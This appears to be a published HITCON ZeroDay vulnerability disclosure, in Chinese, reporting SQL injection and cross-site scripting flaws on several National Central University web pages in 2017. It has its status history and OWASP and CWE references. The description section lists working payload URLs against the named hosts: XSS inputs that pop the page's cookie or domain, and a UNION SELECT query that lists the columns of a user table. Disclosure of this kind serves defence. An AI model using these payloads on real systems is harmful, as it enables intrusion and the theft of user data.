Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00704
- 發信 Vendor: 國立中央大學
- Title: 國立中央大學 分站SQL Injection 多處XSS
- Introduction: SQL Injection Vulnerability 和 XSS
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2017/08/25 20:37:10 : 新提交 (由 x 更新此狀態)
- 2017/08/26 01:06:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/08/30 20:25:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/08/30 20:25:46 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/10/25 03:00:35 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-00704
- 通報者:j41k23 (x)
- 風險:中
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://140.115.55.13/index.php?apps=news&action=more&id=660
http://im.mgt.ncu.edu.tw/08/main_v.php?id=6470
http://www.ee.ncu.edu.tw/bulletin/news_detail.php?OID=69
敘述
http://in.ncu.edu.tw/~ncu7020/ann/index.php?mypartid=3"><img src=x onerror=prompt(domain)>&myrootuid=5&do=&t=1168991176
http://in.ncu.edu.tw/~ncu7020/ann/index.php?mypartid=3"><img src=x onerror=prompt(cookie)>&myrootuid=5&do=&t=1168991176
http://140.115.55.13/index.php?apps=news'><img src=x onerror=prompt(domain)>&action=more&id=660
http://140.115.55.13/index.php?apps=news'><img src=x onerror=prompt(cookie)>&action=more&id=660
http://im.mgt.ncu.edu.tw/08/main_v.php?id=-6470' UNION SELECT 1,2,group_concat(column_name, char(32)),4,5,6,7 from information_schema.columns where table_name='user'-- -
http://www.ee.ncu.edu.tw/bulletin/news_detail.php?OID=69"><svg/onload=prompt(domain)>
http://www.ee.ncu.edu.tw/bulletin/news_detail.php?OID=69"><svg/onload=prompt(cookie)>